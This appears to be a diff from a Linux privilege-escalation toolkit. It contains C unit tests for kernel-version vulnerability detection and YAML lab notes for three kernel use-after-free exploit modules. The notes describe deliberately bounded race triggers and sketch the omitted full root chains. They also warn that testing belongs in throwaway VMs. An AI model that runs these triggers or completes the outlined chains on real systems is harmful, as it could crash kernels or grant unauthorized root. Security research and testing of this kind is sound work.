/* 6.13.0 — newer than 6.12.86 but OLDER than 6.18.27/7.0.4, EOL
|
||||
* branch with no fix → must stay VULNERABLE ("newer than ALL" test). */
|
||||
struct skeletonkey_host h_ghl_6130 =
|
||||
mk_host(h_kernel_6_12, 6, 13, 0, "6.13.0-test");
|
||||
run_one("ghostlock: 6.13.0 newer than some entries but not all → VULNERABLE",
|
||||
&ghostlock_module, &h_ghl_6130,
|
||||
SKELETONKEY_VULNERABLE);
|
||||
|
||||
/* 7.0.3 one below the 7.0.4 backport → VULNERABLE */
|
||||
struct skeletonkey_host h_ghl_7003 =
|
||||
mk_host(h_kernel_6_12, 7, 0, 3, "7.0.3-test");
|
||||
run_one("ghostlock: 7.0.3 below the 7.0.4 backport → VULNERABLE",
|
||||
&ghostlock_module, &h_ghl_7003,
|
||||
SKELETONKEY_VULNERABLE);
|
||||
|
||||
/* 7.0.4 exact backport → OK */
|
||||
struct skeletonkey_host h_ghl_7004 =
|
||||
mk_host(h_kernel_6_12, 7, 0, 4, "7.0.4-test");
|
||||
run_one("ghostlock: 7.0.4 (exact backport) → OK via patch table",
|
||||
&ghostlock_module, &h_ghl_7004,
|
||||
SKELETONKEY_OK);
|
||||
|
||||
/* 7.1.0 newer than every entry → mainline-inherited fix → OK */
|
||||
struct skeletonkey_host h_ghl_710 =
|
||||
mk_host(h_kernel_6_12, 7, 1, 0, "7.1.0-test");
|
||||
run_one("ghostlock: 7.1.0 above all backports → OK (mainline inherit)",
|
||||
&ghostlock_module, &h_ghl_710,
|
||||
SKELETONKEY_OK);
|
||||
|
||||
/* ── coverage report ─────────────────────────────────────────
|
||||
* Iterate the runtime registry (populated by skeletonkey_register_*
|
||||
* calls in main()) and warn for any module that was not touched
|
||||
|
||||
@@ -324,3 +324,21 @@ nft_catchall:
|
||||
kernel_version: "6.1.163"
|
||||
expect_detect: VULNERABLE
|
||||
notes: "CVE-2026-23111; nf_tables nft_map_catchall_activate abort-path UAF (inverted '!'). Public reproduction by FuzzingLabs; fixed upstream f41c5d1, Debian backports 6.1.164 (bookworm) / 6.12.73 (trixie) / 6.18.10 (sid); 5.10/bullseye still unfixed. detect() version-gates (catch-all set elements ~5.13; thresholds 6.1.164/6.12.73/6.18.10) AND requires unprivileged user_ns clone — a vulnerable kernel with userns locked (apparmor_restrict_unprivileged_userns / sysctl 0) is PRECOND_FAIL. exploit() forks an isolated child that builds a verdict map with a catch-all GOTO element and provokes an aborting batch to drive the abort-path UAF, observes nft_chain/cg-256 slabinfo, returns EXPLOIT_FAIL (primitive-only). The per-kernel leak + R/W + modprobe_path ROP is NOT bundled, and the trigger is RECONSTRUCTED from public analysis — NOT yet VM-verified. Provisioner: ensure unprivileged userns enabled (sysctl kernel.unprivileged_userns_clone=1 / drop apparmor restriction). A KASAN kernel will oops on a real fire; sweep + trigger validation pending."
|
||||
|
||||
# ── bad_epoll (CVE-2026-46242) addition ─────────────────────────────
|
||||
|
||||
bad_epoll:
|
||||
box: ubuntu2404
|
||||
kernel_pkg: ""
|
||||
kernel_version: "6.8.0-generic" # >= 6.4 (bug introduced 58c9b016e128) and below the 7.0.13 backport → VULNERABLE by version
|
||||
expect_detect: VULNERABLE
|
||||
notes: "CVE-2026-46242 'Bad Epoll'; epoll ep_remove-vs-__fput teardown race UAF (Jaeyoung Chung / J-jaeyoung kernelCTF PoC). Introduced 6.4 (58c9b016e128); fixed a6dc643c6931 (7.1-rc1), stable backport 7.0.13 (Debian forky 7.0.13-1 / sid 7.0.14-1); trixie 6.12.x still vulnerable, 6.1/5.10 not affected (code not present). detect() is a PURE version gate — no userns/CONFIG probe, because epoll is reachable by every unprivileged user; on Ubuntu 24.04 stock 6.8.0 (in [6.4, 7.0.13)) it returns VULNERABLE. To also confirm the PATCHED verdict, boot a >= 7.0.13 / 7.1 kernel and expect OK. exploit() forks a CPU-pinned child that builds the epoll race pair (waiter eventpoll watching a target eventpoll) and exercises the ep_remove-vs-__fput concurrent-close window a HARD-BOUNDED 48 attempts / 2s, widening it with close(dup()) false-sharing storms, snapshots the eventpoll/kmalloc-192 slab, and returns EXPLOIT_FAIL. DELIBERATELY UNDER-DRIVEN: a won race frees a live struct eventpoll (real corruption that rarely trips KASAN → possible SILENT destabilisation on a vulnerable host), so the module does NOT grind the race to a win, does NOT perform the cross-cache reclaim, and does NOT bundle the /proc/self/fdinfo arb-read + ROP root-pop. Trigger RECONSTRUCTED from the public kernelCTF PoC — NOT VM-verified. Lowest --auto safety rank (12). Provisioner caution: run only in a throwaway VM/snapshot — even the bounded trigger can, on a rare win, corrupt or panic a vulnerable kernel. Detection is intentionally weak (epoll syscalls ubiquitous); no yara. Sweep + trigger validation pending."
|
||||
|
||||
# ── ghostlock (CVE-2026-43499) addition ─────────────────────────────
|
||||
|
||||
ghostlock:
|
||||
box: ubuntu2404
|
||||
kernel_pkg: ""
|
||||
kernel_version: "6.8.0-generic" # >= 2.6.39, below the on-branch fix (no 6.8 backport; not newer than all entries) → VULNERABLE by version
|
||||
expect_detect: VULNERABLE
|
||||
notes: "CVE-2026-43499 'GhostLock'; rtmutex/futex requeue-PI remove_waiter() stack UAF (VEGA / Nebula Security, 'IonStack part II'; public PoC in NebuSec/CyberMeowfia, Apache-2.0). Introduced 2.6.39 (PI-futex requeue); fixed 3bfdc63936dd (7.1-rc1), stable backports 7.0.4 / 6.18.27 / 6.12.86 / 6.6.140 / 6.1.175; 5.15/5.10/5.4/4.19 affected with NO upstream fix. detect() is a PURE version gate over that five-branch table — no userns/CONFIG probe (CVSS PR:L, any local user; CONFIG_FUTEX_PI assumed, near-universal); on Ubuntu 24.04 stock 6.8.0 (below the fix, not newer than all entries) it returns VULNERABLE. To also confirm the PATCHED verdict, boot a >= 7.0.4 / 6.12.86 / 6.6.140 / 6.1.175 on-branch or 7.1 kernel and expect OK; the multi-branch table is exercised by the 9 detect() unit rows in tests/test_detect.c (incl. 6.13.0 → VULNERABLE, the 'newer than some entries but not all' case). exploit() forks an isolated child that (A) deterministically confirms the -EDEADLK remove_waiter() rollback path is reachable (SAFE — without a concurrent priority walk the unwind creates no dangling pointer; validated on real hardware) and (B) exercises the actual race a HARD-BOUNDED 24 iterations / 2s with a sibling-CPU sched_setattr(SCHED_BATCH) storm on the waiter tid, then stops. DELIBERATELY UNDER-DRIVEN: does NOT widen the copy_from_user window (no memfd/PUNCH_HOLE), does NOT spray/reoccupy the freed kernel-stack frame, and does NOT bundle the KernelSnitch page leak → forged rt_mutex_waiter → fops/configfs/ashmem/pipe R/W → cred patch (Android/Pixel-specific, per-build offsets). Trigger RECONSTRUCTED from the public PoC — NOT VM-verified. Lowest --auto safety rank (11). Provisioner caution: run only in a throwaway VM/snapshot — a WON Phase-B race corrupts the kernel STACK and drives a near-arbitrary pointer write (near-certain PANIC on a vulnerable kernel). Detection has a real signature (futex requeue-PI returning EDEADLK + sibling sched_setattr(SCHED_BATCH)); no yara. Sweep + trigger validation pending."
|
||||
|
||||
Reference in New Issue
Block a user